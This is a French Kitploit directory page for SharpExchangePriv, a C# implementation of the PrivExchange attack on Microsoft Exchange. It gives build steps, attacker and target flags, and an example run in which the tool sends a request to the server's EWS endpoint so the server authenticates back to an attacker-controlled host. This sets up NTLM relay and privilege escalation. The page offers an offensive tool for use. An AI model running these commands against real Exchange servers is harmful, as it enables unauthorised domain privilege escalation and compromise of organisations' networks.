Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpExchangePriv — Une implémentation C# de PrivExchange par @_dirkjan. | Kitploit
Outils/GitHubGitHub/panagioto/sharpexchangepriv
Escalade de PrivilègesExploitationTests d'Intrusion
GitHubpanagioto/sharpexchangepriv

SharpExchangePriv

Une implémentation C# de PrivExchange par @_dirkjan.

Voir le dépôt
15528il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpExchangePriv

Description

Une implémentation C# de PrivExchange par @_dirkjan. Merci à @g0ldenGunSec, car je me suis appuyé sur son code.

Il a été testé sur Exchange 2016.

Instructions de compilation

SharpExchangePriv a été construit avec .NET 3.5 et est compatible avec Visual Studio 2017. Ouvrez simplement le fichier solution et compilez le projet.

J'ai utilisé CommandLineParser pour analyser les arguments. Cela créera le fichier CommandLine.dll, ainsi que l'exécutable. Vous pouvez simplement fusionner le .exe et le .dll en un seul fichier exécutable :

ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll

Utilisation

--targetHost

Définissez l'IP de l'hôte cible.

--attackerHost

Définissez l'IP de l'attaquant.

--attackerPort

Définissez le port de l'attaquant.

--attackerPage

Définissez la page de l'attaquant.

--ssl

Activer SSL.

--exchangeVersion

Définissez la version d'Exchange, par défaut 2016.

--exchangePort

Définissez le port cible d'Exchange.

Exemple

root@kitploit:~
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
 /$$$$$$$           /$$            /$$$$$$$$                     /$$
| $$__  $$         |__/           | $$_____/                    | $$
| $$  \ $$ /$$$$$$  /$$ /$$    /$$| $$       /$$   /$$  /$$$$$$$| $$$$$$$   /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$
| $$$$$$$//$$__  $$| $$|  $$  /$$/| $$$$$   |  $$ /$$/ /$$_____/| $$__  $$ |____  $$| $$__  $$ /$$__  $$ /$$__  $$
| $$____ /| $$  \__ /| $$ \  $$/$$/ | $$__ /    \  $$$$/ | $$      | $$  \ $$  /$$$$$$$| $$  \ $$| $$  \ $$| $$$$$$$$
| $$     | $$      | $$  \  $$$/  | $$        >$$  $$ | $$      | $$  | $$ /$$__  $$| $$  | $$| $$  | $$| $$_____ /
| $$     | $$      | $$   \  $/   | $$$$$$$$ /$$/\  $$|  $$$$$$$| $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$|  $$$$$$$
|__/     |__/      |__/    \_/    |________/|__/  \__/ \_______/|__/  |__/ \_______/|__/  |__/ \____  $$ \_______/
                                                                                               /$$  \ $$
                                                                                              |  $$$$$$/
                                                                                               \______ /
                                                                                                            @den_n1s

The target URL is https://192.168.11.10:443/EWS/Exchange.asmx

Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx

HTTP 200 response received, the target Exchange server should be authenticating shortly.

Contact

Veuillez soumettre tout bug sur la page du projet Github ou contactez-moi sur Twitter @den_n1s.

Télécharger l’outil